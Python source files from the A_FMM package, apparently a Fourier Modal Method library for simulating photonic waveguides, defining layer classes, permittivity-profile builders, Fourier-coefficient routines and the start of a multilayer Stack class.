"""Creates the array of modal coefficient using a dictionary as input
Args:
            dic (dict): Dictionary of excited modes {modal_index : modal_coeff}. Modes are ordered.
Returns:
u (1darray): Array of modal coefficient.
"""
u = np.zeros((2 * self.NPW), complex)
for i in dic:
u[np.argsort(self.W)[-i - 1]] = dic[i]
return u
def get_Enorm(self):
"""Calculate field normalization
Returns:
None.
"""
[VEx, VEy] = np.split(self.V, 2)
self.ENx = np.dot(np.transpose(VEx), np.conj(VEx))
self.ENy = np.dot(np.transpose(VEy), np.conj(VEy))
def overlap(self, u: np.ndarray, up: np.ndarray = None):
"""EXPERIMENTAL: Calculates overlap between two fields given the modal expansion
Args:
u (1darray): Modal coefficient of first mode.
            up (1darray, optional): Modal coefficient of second mode. Defaults to None (up=u, namely normalization is returned).
        Returns:
            list: [tx, ty]: floats. Namely overlap in x and y polarization
"""
if up is None:
up = u
try:
self.ENx
except AttributeError:
self.get_Enorm()
# print np.shape(u),np.shape(self.ENx)
tx = np.dot(self.ENx, np.conj(up))
ty = np.dot(self.ENy, np.conj(up))
tx = np.dot(np.transpose(u), tx)
ty = np.dot(np.transpose(u), ty)
# print tx,ty
return [tx, ty]
def coupling(self, u: np.ndarray, up: np.ndarray) -> tuple:
"""EXPERIMENTAL: Calculates coupling between two modes given their modal exapnsion
Args:
u (TYPE): Modal coefficient of first mode.
up (TYPE): Modal coefficient of second mode.
Returns:
list: [tx, tx]: floats. Coupling in x and y polarization.
"""
self.get_Enorm()
[tx1, ty1] = self.overlap(u)
[tx2, ty2] = self.overlap(up)
[txc, tyc] = self.overlap(u, up)
return txc / np.sqrt(tx1 * tx2), tyc / np.sqrt(ty1 * ty2)
class Layer_ani_diag(Layer):
"""Class for the definition of a single layer anysitropic (diagonal) layer"""
def __init__(
self,
Nx: int,
Ny: int,
creator_x: Creator,
creator_y: Creator,
creator_z: Creator,
Nyx: float = 1.0,
):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.creator = [
copy.deepcopy(creator_x),
copy.deepcopy(creator_y),
copy.deepcopy(creator_z),
]
self.Nyx = Nyx
self.FOUP = sub.create_epsilon(
self.G,
self.creator[2].x_list,
self.creator[2].y_list,
self.creator[2].eps_lists,
)
self.INV = linalg.inv(self.FOUP)
self.EPS1 = sub.fou_xy(
self.Nx,
self.Ny,
self.G,
self.creator[0].x_list,
self.creator[0].y_list,
self.creator[0].eps_lists,
)
self.EPS2 = sub.fou_yx(
self.Nx,
self.Ny,
self.G,
self.creator[1].x_list,
self.creator[1].y_list,
self.creator[1].eps_lists,
)
self.TX = False
self.TY = False
class Layer_num(Layer):
"""Class for the definition of a single layer from a function defining the dielectric profile"""
def __init__(
self,
Nx: int,
Ny: int,
func: callable,
args: tuple = None,
Nyx: float = 1.0,
NX: int = 2048,
NY: int = 2048,
):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.Nyx = Nyx
self.func = func
self.args = args
self.NX = NX
self.NY = NY
# print args
args = () if args is None else args
self.FOUP = sub.num_fou(func, args, self.G, NX, NY, self.Nyx)
self.INV = linalg.inv(self.FOUP)
# Still to be defined
self.EPS1 = sub.num_fou_xy(
self.func, self.args, self.Nx, self.Ny, self.G, NX, NY, self.Nyx
)
self.EPS2 = sub.num_fou_yx(
self.func, self.args, self.Nx, self.Ny, self.G, NX, NY, self.Nyx
)
self.TX = False
self.TY = False
class Layer_uniform(Layer):
"""Class for the definition of a single uniform layer"""
def __init__(self, Nx: int, Ny: int, eps: float | complex, Nyx: float = 1.0):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.Nyx = Nyx
self.eps = eps
self.FOUP = eps * np.identity(self.D, dtype="complex")
self.INV = 1.0 / eps * np.identity(self.D, dtype="complex")
# Still to be defined
self.EPS1 = eps * np.identity(self.D, dtype="complex")
self.EPS2 = eps * np.identity(self.D, dtype="complex")
self.TX = False
self.TY = False
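# Example (sketch): a uniform layer is handy as a semi-infinite cladding in a
# Stack; eps = 2.0 here is an assumed value.
#
#   clad = Layer_uniform(15, 0, 2.0)
#   clad.mode(1.0 / 1.55)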
class Layer_empty_st(Layer):
"""Class for the definition of an empy layer"""
def __init__(self, Nx: int, Ny: int, creator: Creator, Nyx: float = 1.0):
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.D = len(self.G)
self.creator = copy.deepcopy(creator)
self.Nyx = Nyx
self.TX = False
self.TY = False
self.FOUP = np.zeros((self.D, self.D), dtype=complex)
        # self.INV=np.zeros((self.D,self.D),dtype=complex)
        self.INV = np.eye(self.D, dtype=complex)  # inverse of the identity is the identity
self.EPS1 = np.zeros((self.D, self.D), dtype=complex)
self.EPS2 = np.zeros((self.D, self.D), dtype=complex)
def fourier(self):
"""Calculates the fourier transform matrices need for the eigenvalue problem.
Returns:
2darray: FOUP matrix.
2darray: INV matrix.
2darray: EPS1 matrix.
2darray: EPS2 matrix.
"""
self.FOUP = sub.create_epsilon(
self.G, self.creator.x_list, self.creator.y_list, self.creator.eps_lists
) * (1.0 + 0.0j)
self.INV = linalg.inv(self.FOUP)
self.EPS1 = sub.fou_xy(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
) * (1.0 + 0.0j)
self.EPS2 = sub.fou_yx(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
) * (1.0 + 0.0j)
return (self.FOUP, self.INV, self.EPS1, self.EPS2)
if __name__ == "__main__":
fig, ax = plt.subplots(1, 3, figsize=(12, 4))
cr = Creator()
cr.rect(12.0, 2.0, 0.5, 0.2)
lay = Layer(15, 15, cr)
t = np.linspace(-0.5, 0.5, 101)
x, y, z = t, t, t
eps = lay.calculate_epsilon(x, y, z)
ax[0].contourf(
eps["x"][:, :, 50],
eps["y"][:, :, 50],
eps["eps"][:, :, 50],
)
ax[1].contourf(
eps["x"][:, 50, :],
eps["z"][:, 50, :],
eps["eps"][:, 50, :],
)
ax[2].contourf(
eps["y"][50, :, :],
eps["z"][50, :, :],
eps["eps"][50, :, :],
)
    plt.show()

# ---- end of file: A_FMM/layer.py ----
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
import A_FMM.sub_sm as sub
from matplotlib.backends.backend_pdf import PdfPages
class Creator:
"""Class for the definition of the eps profile in the layer"""
def __init__(self, x_list=None, y_list=None, eps_lists=None):
"""Creator
Args:
            x_list (list): list of floats containing the coordinates of the x boundaries
            y_list (list): list of floats containing the coordinates of the y boundaries
            eps_lists (list): list of lists of floats containing the eps values of the rectangles defined by x_list and y_list
"""
self.x_list = x_list
self.y_list = y_list
self.eps_lists = eps_lists
def slow_general(self, eps_core, eps_lc, eps_uc, w, h, t, Z):
self.x_list = np.linspace(-0.5 * w, 0.5 * w, len(Z) + 1)
self.y_list = [-0.5, -0.5 * h, -0.5 * h + t, 0.5 * h]
self.eps_lists = [[eps_uc, eps_lc, eps_core, eps_uc]]
eps = [eps_uc, eps_core]
for i in Z:
self.eps_lists.append([eps_uc, eps_lc, eps_core, eps[i]])
def slow_2D(self, eps_core, eps_c, w, Z):
self.x_list = np.linspace(-0.5 * w, 0.5 * w, len(Z) + 1)
self.y_list = [-0.5]
self.eps_lists = [[eps_c]]
eps = [eps_c, eps_core]
for i in Z:
self.eps_lists.append([eps[i]])
def ridge(self, eps_core, eps_lc, eps_uc, w, h, t=0.0, y_offset=0.0, x_offset=0.0):
"""Rib waveguide with single layer
Args:
eps_core (float): epsilon of the core
            eps_lc (float): epsilon of the lower cladding
            eps_uc (float): epsilon of the upper cladding
            w (float): width of the rib (in unit of ax)
            h (float): height of the un-etched part (in unit of ay)
            t (float): height of the etched part (in unit of ay). Default is 0 (strip waveguide)
            x_offset (float): offset of the center of the waveguide with respect to the center of the cell (in unit of ax). Default is 0
            y_offset (float): offset of the etched part with respect to the unetched one (in unit of ay). Default is 0 (etched and unetched parts are aligned at the bottom)
"""
self.x_list = [-0.5 * w + x_offset, 0.5 * w + x_offset]
self.y_list = [
-0.5,
-0.5 * h,
-0.5 * h + y_offset,
-0.5 * h + t + y_offset,
0.5 * h,
]
self.eps_lists = [
[eps_uc, eps_lc, eps_lc, eps_core, eps_uc],
[eps_uc, eps_lc, eps_core, eps_core, eps_core],
]
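    # Example (sketch, assumed dimensions and materials): a silicon strip
    # waveguide, 0.5 ax wide and 0.22 ay thick, with silica claddings.
    #
    #   cr = Creator()
    #   cr.ridge(12.11, 2.085, 2.085, w=0.5, h=0.22)
    #   # pass cr to a Layer to obtain its Fourier representation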
def ridge_pn(self, eps0, epsp, epsn, eps_lc, eps_uc, w, h, t, xp, xn):
if xp < -0.5 * w:
x_left = [xp, -0.5 * w]
eps_left = [[eps_uc, eps_lc, epsp, eps_uc], [eps_uc, eps_lc, eps0, eps_uc]]
else:
x_left = [-0.5 * w, xp]
eps_left = [[eps_uc, eps_lc, epsp, eps_uc], [eps_uc, eps_lc, epsp, epsp]]
if xn > 0.5 * w:
x_right = [0.5 * w, xn, 0.5]
eps_right = [
[eps_uc, eps_lc, eps0, eps0],
[eps_uc, eps_lc, eps0, eps_uc],
[eps_uc, eps_lc, epsn, eps_uc],
]
else:
x_right = [xn, 0.5 * w, xn]
eps_right = [
[eps_uc, eps_lc, eps0, eps0],
[eps_uc, eps_lc, epsn, epsn],
[eps_uc, eps_lc, epsn, eps_uc],
]
self.x_list = x_left + x_right
self.y_list = [-0.5, -0.5 * h, -0.5 * h + t, 0.5 * h]
self.eps_lists = eps_left + eps_right
def ridge_double(
self, eps_core, eps_lc, eps_uc, w1, w2, h, t1, t2, y_offset=0.0, x_offset=0.0
):
"""Rib waveguide with double etch
Args:
eps_core (float): epsilon of the core
            eps_lc (float): epsilon of the lower cladding
            eps_uc (float): epsilon of the upper cladding
            w1 (float): width of the unetched part (in unit of ax)
            w2 (float): width of the intermediate etched part (in unit of ax)
            h (float): height of the un-etched part (in unit of ay)
            t1 (float): height of the intermediate etched part (in unit of ay).
            t2 (float): height of the maximum etched part (in unit of ay).
            x_offset (float): offset of the center of the waveguide with respect to the center of the cell (in unit of ax). Default is 0
            y_offset (float): offset of the etched part with respect to the unetched one (in unit of ay). Default is 0 (etched and unetched parts are aligned at the bottom)
"""
self.x_list = [
-0.5 * w2 + x_offset,
-0.5 * w1 + x_offset,
0.5 * w1 + x_offset,
0.5 * w2 + x_offset,
]
self.y_list = [
-0.5,
-0.5 * h,
-0.5 * h + y_offset,
-0.5 * h + t2 + y_offset,
-0.5 * h + t1 + y_offset,
0.5 * h,
]
self.eps_lists = [
[eps_uc, eps_lc, eps_lc, eps_core, eps_uc, eps_uc],
[eps_uc, eps_lc, eps_lc, eps_core, eps_core, eps_uc],
[eps_uc, eps_lc, eps_core, eps_core, eps_core, eps_core],
[eps_uc, eps_lc, eps_lc, eps_core, eps_core, eps_uc],
]
def rect(self, eps_core, eps_clad, w, h, off_x=0.0, off_y=0.0):
"""Rectangular waveguide
Args:
eps_core (float): epsilon of the core
            eps_clad (float): epsilon of the cladding
w (float): width of the waveguide (in unit of ax)
h (float): height of the waveguide (in unit of ay)
off_y (float): offset of the center of the waveguide with respect to the cell (in unit of ay). Default is 0.
off_x (float): offset of the center of the waveguide with respect to the cell (in unit of ax). Default is 0.
"""
self.x_list = [-0.5 * w + off_x, 0.5 * w + off_x]
self.y_list = [-0.5 * h + off_y, 0.5 * h + off_y]
self.eps_lists = [[eps_clad, eps_clad], [eps_clad, eps_core]]
def slab(self, eps_core, eps_lc, eps_uc, w, offset=0.0):
"""1D slab in x direction
Args:
eps_core (float): epsilon of the core.
eps_lc (float): epsilon of the lower cladding.
eps_uc (float): epsilon of the upper cladding.
w (float): thickness of the slab (in unit of ax).
            offset (float, optional): Offset of the slab with respect to the center of the cell. Defaults to 0.0.
Returns:
None.
"""
self.x_list = [-0.5, -0.5 * w + offset, 0.5 * w + offset]
self.y_list = [0.5]
self.eps_lists = [[eps_uc], [eps_lc], [eps_core]]
def slab_y(self, eps_core, eps_lc, eps_uc, w):
"""1D slab in y direction
Args:
eps_core (float): epsilon of the core.
eps_lc (float): epsilon of the lower cladding.
eps_uc (float): epsilon of the upper cladding.
w (float): thickness of the slab (in unit of ay).
Returns:
None.
"""
self.x_list = [0.5]
self.y_list = [-0.5, -0.5 * w, 0.5 * w]
self.eps_lists = [[eps_uc, eps_lc, eps_core]]
def x_stack(self, x_l, eps_l):
self.y_list = [0.5]
self.x_list = [-0.5] + x_l
self.eps_lists = [[eps_l[-1]]]
for eps in eps_l:
self.eps_lists.append([eps])
def hole(self, h, w, r, e_core, e_lc, e_up, e_fill):
"""Rib waveguide with a hole in the middle
Args:
            h (float): height of the waveguide (in unit of ay).
            w (float): width of the waveguide (in unit of ax).
            r (float): radius of the internal hole (in unit of ax).
            e_core (float): epsilon of the core.
            e_lc (float): epsilon of the lower cladding.
            e_up (float): epsilon of the upper cladding.
            e_fill (float): epsilon inside the hole.
Returns:
None.
"""
self.x_list = [-0.5 * w, -r, r, 0.5 * w]
self.y_list = [-0.5 * h, 0.5 * h, 0.5]
self.eps_lists = [
[e_lc, e_up, e_up],
[e_lc, e_core, e_up],
[e_lc, e_fill, e_up],
[e_lc, e_core, e_up],
]
def circle(self, e_in, e_out, r, n):
self.x_list = np.linspace(-r, r, n)
self.y_list = np.linspace(-r, r, n)
[X, Y] = np.meshgrid(self.x_list, self.y_list)
# ind= np.sqrt((X-0.5*r/float(n))**2+(Y-0.5*r/float(n))**2)<r
ind = np.sqrt(X**2 + Y**2) < r
# eps=np.array([e_out,e_in])
self.eps_lists = e_out + ind * (e_in - e_out)
def etched_stack(self, eps_uc, eps_lc, w, etch, eps_stack, d_stack):
h = sum(d_stack)
self.x_list = [-0.5 * w, 0.5 * w]
self.y_list = [-0.5]
eps1 = [eps_uc, eps_lc]
eps2 = [eps_uc, eps_lc]
dd = np.cumsum(d_stack)
if etch > h:
self.y_list.append(0.5 * h - etch)
eps1.append(eps1[-1])
eps2.append(eps_uc)
dec = 1
else:
dec = 0
for d, eps in zip(reversed(dd), reversed(eps_stack)):
if (d < etch) and (dec == 0):
self.y_list.append(0.5 * h - etch)
eps1.append(eps1[-1])
eps2.append(eps_uc)
dec = 1
self.y_list.append(0.5 * h - d)
eps1.append(eps)
if dec == 0:
eps2.append(eps)
else:
eps2.append(eps_uc)
self.y_list.append(0.5 * h)
self.eps_lists = [eps2, eps1]
def varied_epi(self, eps_back, data_list, y_off=0.0):
t_tot = sum([dd[2] for dd in data_list])
w_list = np.sort(list(set([0.5 * dd[1] for dd in data_list])))
self.x_list = [-0.5] + list(-w_list[::-1]) + list(w_list)
self.y_list = [-0.5 * t_tot] + list(
-0.5 * t_tot + np.cumsum([dd[2] for dd in data_list])
)
self.y_list = [_ + y_off for _ in self.y_list]
self.eps_lists = [len(self.y_list) * [eps_back]]
for pos in self.x_list:
eps_list = [eps_back]
for eps, w, t in data_list:
if pos < -0.5 * w:
eps_list.append(eps_back)
elif pos >= 0.5 * w:
eps_list.append(eps_back)
else:
eps_list.append(eps)
self.eps_lists.append(eps_list)
def varied_plane(self, eps_back, t, data_list):
self.y_list = [-0.5 * t, 0.5 * t]
w_tot = sum([dd[1] for dd in data_list])
self.x_list = [-0.5 * w_tot] + list(
-0.5 * w_tot + np.cumsum([dd[1] for dd in data_list])
)
self.eps_lists = [len(self.y_list) * [eps_back]]
for i, (eps, w) in enumerate(data_list):
eps_list = [eps_back, eps]
self.eps_lists.append(eps_list)
# print(self.y_list)
# print(self.x_list)
# print(self.eps_lists)
    def plot_eps(self, N=101):
        """Reconstructs the epsilon profile on an NxN grid and plots it (debug helper)"""
        EPS = np.zeros((N, N)) + self.eps_lists[0][0]
        x = np.linspace(-0.5, 0.5, N)
        y = np.linspace(-0.5, 0.5, N)
        x, y = np.meshgrid(x, y, indexing="ij")
        x_old = -0.5
        for xv, el in zip(self.x_list, self.eps_lists):
            EPS[np.logical_and(x >= xv, x <= x_old)] = el[0]
            for yv, e in zip(self.y_list, el):
                EPS[np.logical_and(x >= xv, y >= yv)] = e
            x_old = xv
        plt.imshow(EPS.T, origin="lower", extent=(-0.5, 0.5, -0.5, 0.5))
        plt.colorbar()
        plt.show()
        return EPS

# ---- end of file: A_FMM/creator.py ----
import numpy as np
from scipy import integrate
from scipy import linalg
import matplotlib.pyplot as plt
import numpy.linalg
import inspect
from matplotlib.backends.backend_pdf import PdfPages
def savefig(pdf, fig):
if isinstance(pdf, PdfPages):
pdf.savefig(fig)
elif isinstance(pdf, str):
with PdfPages(pdf) as a:
a.savefig(fig)
if pdf is not None:
plt.close()
def get_user_attributes(cls):
boring = dir(type("dummy", (object,), {}))
return [item for item in inspect.getmembers(cls) if item[0] not in boring]
def createG(Ng1, Ng2):
dic = {}
n = 0
for i in range(-Ng1, Ng1 + 1):
for j in range(-Ng2, Ng2 + 1):
# for j in range(-Ng2,Ng2+1):
# for i in range(-Ng1,Ng1+1):
dic[n] = (i, j)
n += 1
return dic
def inter_(n, x_list, eps_list):
if n == 0:
return eps_list[0] + sum(
[
-(eps_list[(j + 1) % len(eps_list)] - eps_list[j]) * x_list[j]
for j in range(len(x_list))
]
)
else:
return sum(
[
(eps_list[(j + 1) % len(eps_list)] - eps_list[j])
* np.exp(-(0 + 2j) * np.pi * n * x_list[j])
for j in range(len(x_list))
]
) / ((0 + 2j) * np.pi * n)
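# The coefficients above are the analytic Fourier integrals of a piecewise
# constant profile with jumps at x_list: for n != 0,
#   c_n = sum_j (eps_{j+1} - eps_j) * exp(-2j*pi*n*x_j) / (2j*pi*n).
# A quick sanity check against a direct FFT (sketch, assumed test profile):
#
#   x = np.linspace(-0.5, 0.5, 4096, endpoint=False)
#   prof = np.where(np.abs(x) < 0.25, 12.0, 2.0)
#   fft_c1 = np.fft.fft(np.fft.fftshift(prof))[1] / x.size
#   ana_c1 = inter_(1, [-0.25, 0.25], [2.0, 12.0])   # should nearly match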
def inter_v(n, x_list, eps_list):
if n == 0:
return 1.0 / eps_list[0] + sum(
[
-(1.0 / eps_list[(j + 1) % len(eps_list)] - 1.0 / eps_list[j])
* x_list[j]
for j in range(len(x_list))
]
)
else:
return sum(
[
(1.0 / eps_list[(j + 1) % len(eps_list)] - 1.0 / eps_list[j])
* np.exp(-(0 + 2j) * np.pi * n * x_list[j])
for j in range(len(x_list))
]
) / ((0 + 2j) * np.pi * n)
def fou(nx, ny, x_list, y_list, eps_lists):
N = len(x_list)
f = []
for i in range(N):
f.append(inter_(ny, y_list, eps_lists[i]))
return (1 + 0j) * inter_(nx, x_list, f)
def create_epsilon(G, x_list, y_list, eps_lists):
D = len(G)
F = np.zeros((D, D), complex)
for i in range(D):
for j in range(D):
F[i, j] = fou(
G[i][0] - G[j][0], G[i][1] - G[j][1], x_list, y_list, eps_lists
)
return F
def fou_v(nx, ny, x_list, y_list, eps_lists):
N = len(x_list)
f = []
for i in range(N):
f.append(inter_v(ny, y_list, eps_lists[i]))
return (1 + 0j) * inter_(nx, x_list, f)
def fou_yx(Nx, Ny, G, x_list, y_list, eps_lists):
f = []
D = len(G)
nx = len(x_list)
for i in range(nx):
f.append(
linalg.inv(
linalg.toeplitz(
[inter_v(j + Ny, y_list, eps_lists[i]) for j in range(-Ny, Ny + 1)]
)
)
)
F = np.zeros((D, D), complex)
mx = 4 * Nx + 1
f = [inter_((i + 2 * Nx) % mx - 2 * Nx, x_list, f) for i in range(mx)]
for i in range(D):
for j in range(D):
F[i, j] = f[G[i][0] - G[j][0]][G[i][1] + Ny, G[j][1] + Ny]
return F
def fou_xy(Nx, Ny, G, x_list, y_list, eps_lists):
f = []
D = len(G)
nx = len(x_list)
ny = len(y_list)
for i in range(ny):
eps_t = [eps_lists[j][i] for j in range(nx)]
f.append(
linalg.inv(
linalg.toeplitz(
[inter_v(j + Nx, x_list, eps_t) for j in range(-Nx, Nx + 1)]
)
)
)
F = np.zeros((D, D), complex)
my = 4 * Ny + 1
f = [inter_((i + 2 * Ny) % my - 2 * Ny, y_list, f) for i in range(my)]
for i in range(D):
for j in range(D):
F[i, j] = f[G[i][1] - G[j][1]][G[i][0] + Nx, G[j][0] + Nx]
return F
def plot(n_max, x_list, eps_list, N=100):
x = np.linspace(-0.5, 0.5, N)
y = np.zeros(N, complex)
for n in range(-n_max, n_max + 1):
y += inter_(n, x_list, eps_list) * np.exp((0 + 2j) * np.pi * n * x)
# y+= slab_f(n,0.4)*np.exp((0+2j)*np.pi*n*x)
plt.plot(x, np.real(y))
plt.show()
def createK(dic, k0, kx=0.0, ky=0.0, Nyx=1.0):
D = len(dic)
K1 = np.zeros((D, D), dtype=complex)
K2 = np.zeros((D, D), dtype=complex)
for i in range(D):
# K1[i,i]=2.0*np.pi*dic[i][0]/k0*(1+0j)
# K2[i,i]=2.0*np.pi*dic[i][1]/k0*(1+0j)
K1[i, i] = (1 + 0j) * (dic[i][0] + kx) / k0
K2[i, i] = (1 + 0j) * (dic[i][1] + ky) / k0 / Nyx
return (K1, K2)
def create_2order(dic, K1, K2, INV, EPS1, EPS2):
D = len(dic)
ID = np.identity(D, dtype="complex")
I11 = -np.dot(K2, np.dot(INV, K1))
I12 = np.dot(K2, np.dot(INV, K2)) - ID
I21 = ID - np.dot(K1, np.dot(INV, K1))
I22 = np.dot(K1, np.dot(INV, K2))
B12 = np.vstack([np.hstack([I11, I12]), np.hstack([I21, I22])])
I11 = np.dot(K1, K2)
I22 = -np.dot(K1, K2)
I21 = np.dot(K1, K1) - EPS2
I12 = EPS1 - np.dot(K2, K2)
B21 = np.vstack([np.hstack([I11, I12]), np.hstack([I21, I22])])
# B=np.dot(B12,B21)
# print 3*'%15.8e' % (numpy.linalg.cond(B12),numpy.linalg.cond(B21),numpy.linalg.cond(B))
return np.dot(B12, B21)
# convention of Li article
def create_2order_new(D, Kx, Ky, INV, EPS1, EPS2):
ID = np.identity(D, dtype="complex")
F = np.vstack(
[
np.hstack([np.dot(np.dot(Kx, INV), Ky), ID - np.dot(np.dot(Kx, INV), Kx)]),
np.hstack([np.dot(np.dot(Ky, INV), Ky) - ID, -np.dot(np.dot(Ky, INV), Kx)]),
]
)
G = np.vstack(
[
np.hstack([-np.dot(Kx, Ky), np.dot(Kx, Kx) - EPS2]),
np.hstack([EPS1 - np.dot(Ky, Ky), np.dot(Kx, Ky)]),
]
)
# old version for control
# G=np.vstack([np.hstack([-np.dot(Kx,Ky),np.dot(Kx,Kx)-EPS2]),np.hstack([EPS1-np.dot(Ky,Ky),np.dot(Ky,Kx)])])
# F=np.vstack([np.hstack([np.dot(np.dot(Kx,INV),Ky),ID-np.dot(np.dot(Kx,INV),Kx)]),np.hstack([np.dot(np.dot(Ky,INV),Ky)-ID,-np.dot(np.dot(Ky,INV),Kx)])])
return G, np.dot(F, G)
# convention of Lalanne article
# def create_2order_new(D,Kx,Ky,INV,EPS1,EPS2):
# ID=np.identity(D,dtype='complex')
# F=np.vstack([np.hstack([np.dot(np.dot(Ky,INV),Kx),ID-np.dot(np.dot(Ky,INV),Ky)]),np.hstack([np.dot(np.dot(Kx,INV),Kx)-ID,-np.dot(np.dot(Kx,INV),Ky)])])
# G=np.vstack([np.hstack([np.dot(Kx,Ky),EPS1-np.dot(Ky,Ky)]),np.hstack([np.dot(Kx,Kx)-EPS2,-np.dot(Kx,Ky)])])
# return np.dot(F,G)
def fou_t(n, e):
q = 1.0 - e
return 1.0 * (n == 0) - 0.5 * q * (-1) ** n * (
np.sinc(n * q) + 0.5 * np.sinc(n * q - 1) + 0.5 * np.sinc(n * q + 1)
)
def t_inv(x, e):
q = 1.0 - e
e = 0.5 * e
xr = np.copy(x)
ind = np.abs(x) > e
xr[ind] = np.sign(x[ind]) * (
e + q / np.pi * np.arctan(np.pi / q * (np.abs(x[ind]) - e))
)
return xr
def t_dir(x, e):
q = 1.0 - e
e = 0.5 * e
xr = np.copy(x)
ind = np.abs(x) > e
xr[ind] = np.sign(x[ind]) * (
e + q / np.pi * np.tan(np.pi / q * (np.abs(x[ind]) - e))
)
return xr
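# t_dir and t_inv implement the real coordinate stretching used by the
# aperiodic FMM: inside |x| <= e/2 the map is the identity, outside it is a
# tan/arctan pair, so each is the inverse of the other. Quick check (sketch):
#
#   xs = np.linspace(-0.45, 0.45, 11)
#   assert np.allclose(t_inv(t_dir(xs, 0.6), 0.6), xs)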
def fou_complex_t(n, e):
g = 1.0 / (1 - 1j)
q = 1.0 - e
return 1.0 * (n == 0) - 0.5 * q * (-1) ** n * (
(1.0 + 0.25 * g) * np.sinc(n * q)
+ 0.5 * np.sinc(n * q - 1)
+ 0.5 * np.sinc(n * q + 1)
- g / 8.0 * (np.sinc(n * q - 2) + np.sinc(n * q + 2))
)
def num_fou(func, args, G, NX, NY, Nyx):
# [X,Y]=np.meshgrid(np.linspace(-0.5,0.5,NX),np.linspace(-0.5,0.5,NY))
[Y, X] = np.meshgrid(np.linspace(-0.5, 0.5, NY), np.linspace(-0.5, 0.5, NX))
F = func(X, Y / Nyx, *args)
F = np.fft.fftshift(F)
FOU = np.fft.fft2(F) / NX / NY
EPS = np.zeros((len(G), len(G)), dtype=complex)
for i in range(len(G)):
for j in range(len(G)):
EPS[i, j] = FOU[G[i][0] - G[j][0], G[i][1] - G[j][1]]
return EPS
def num_fou_xy(func, args, nx, ny, G, NX, NY, Nyx):
# [X,Y]=np.meshgrid(np.linspace(-0.5,0.5,NX),np.linspace(-0.5,0.5,NY))
[Y, X] = np.meshgrid(np.linspace(-0.5, 0.5, NY), np.linspace(-0.5, 0.5, NX))
F = 1.0 / func(X, Y / Nyx, *args)
F = np.fft.fftshift(F)
FOU = np.fft.fft(F, axis=0) / NX
TEMP1 = np.zeros((NY, 2 * nx + 1, 2 * nx + 1), dtype=complex)
for i in range(-nx, nx + 1):
for j in range(-nx, nx + 1):
TEMP1[:, i, j] = FOU[i - j, :]
# print TEMP1[900,:,:]
TEMP2 = np.linalg.inv(TEMP1)
TEMP3 = np.fft.fft(TEMP2, axis=0) / NY
EPS = np.zeros((len(G), len(G)), dtype=complex)
for i in range(len(G)):
for j in range(len(G)):
EPS[i, j] = TEMP3[G[i][1] - G[j][1], G[i][0], G[j][0]]
return EPS
# return None
def num_fou_yx(func, args, nx, ny, G, NX, NY, Nyx):
# [X,Y]=np.meshgrid(np.linspace(-0.5,0.5,NX),np.linspace(-0.5,0.5,NY))
[Y, X] = np.meshgrid(np.linspace(-0.5, 0.5, NY), np.linspace(-0.5, 0.5, NX))
F = 1.0 / func(X, Y / Nyx, *args)
F = np.fft.fftshift(F)
FOU = np.fft.fft(F, axis=1) / NY
TEMP1 = np.zeros((NX, 2 * ny + 1, 2 * ny + 1), dtype=complex)
for i in range(-ny, ny + 1):
for j in range(-ny, ny + 1):
TEMP1[:, i, j] = FOU[:, i - j]
# print TEMP1[900,:,:]
TEMP2 = np.linalg.inv(TEMP1)
TEMP3 = np.fft.fft(TEMP2, axis=0) / NX
EPS = np.zeros((len(G), len(G)), dtype=complex)
for i in range(len(G)):
for j in range(len(G)):
EPS[i, j] = TEMP3[G[i][0] - G[j][0], G[i][1], G[j][1]]
return EPS
    # return None

# ---- end of file: A_FMM/sub_sm.py ----
from __future__ import annotations
import numpy as np
import A_FMM
import A_FMM.layer
import A_FMM.sub_sm as sub
from A_FMM.layer import Layer
from A_FMM.scattering import S_matrix
import matplotlib.pyplot as plt
import copy
from A_FMM.layer import Layer_empty_st
from matplotlib.backends.backend_pdf import PdfPages
# =============================================================================
# try:
# from multiprocessing import Pool
# except ModuleNotFoundError:
# print('WARNING: multiprocessing not available')
# =============================================================================
class Stack:
"""Class representing the multylayer object
This class is used for the definition of the multilayer object to be simulated using fourier expansion (x and y axis) and scattering matrix algorithm (z axis).
It is built from a list of layers and thicknesses. The value of the thickness of the first and last layer is irrelevant for the simulation, and it is used only to set the plotting window.
"""
def __init__(self, layers: list[Layer] = None, d: list[float] = None) -> None:
"""Creator
Args:
            layers (list, optional): List of Layers: layers of the multilayer. Defaults to None (empty list).
            d (list, optional): List of float: thicknesses of the multilayer. Defaults to None (empty list).
Raises:
ValueError: Raised if d and mat have different lengths
Returns:
None.
"""
layers = [] if layers is None else layers
        d = [] if d is None else d
if len(layers) != len(d):
raise ValueError("Different number of layers and thicknesses")
self.N = len(layers)
self.layers = layers
self.d = d
self.NPW = self.layers[0].D
self.G = self.layers[0].G
self.Nyx = self.layers[0].Nyx
self.count_interface()
@property
def total_length(self):
return sum(self.d)
def add_layer(self, lay: Layer, d: float) -> None:
"""Add a layer at the end of the multilayer
Args:
lay (Layer): Layer to be added.
d (float): thickness of the layer.
Returns:
None.
"""
self.layers.append(lay)
self.d.append(d)
self.N += 1
self.count_interface()
def transform(
self, ex: float = 0, ey: float = 0, complex_transform: bool = False
) -> tuple[np.ndarray]:
"""Function for adding the real coordinate transform to all layers of the stack
Note: for no mapping, set the width to 0
Args:
ex (float): relative width of the unmapped region in x direction. Default is 0 (no mapping)
ey (float): relative width of the unmapped region in y direction. Default is 0 (no mapping)
complex_transform (bool): False for real transform (default), True for complex one.
"""
Fx, Fy = self.layers[0].transform(
ex=ex, ey=ey, complex_transform=complex_transform
)
for layer in self.layers[1:]:
layer.add_transform_matrix(ex=ex, FX=Fx, ey=ey, FY=Fy)
return Fx, Fy
def count_interface(self) -> None:
"""Helper function to identify the different layers and the needed interfaces
Returns:
None.
"""
self.tot_thick = sum(self.d)
self.lay_list = []
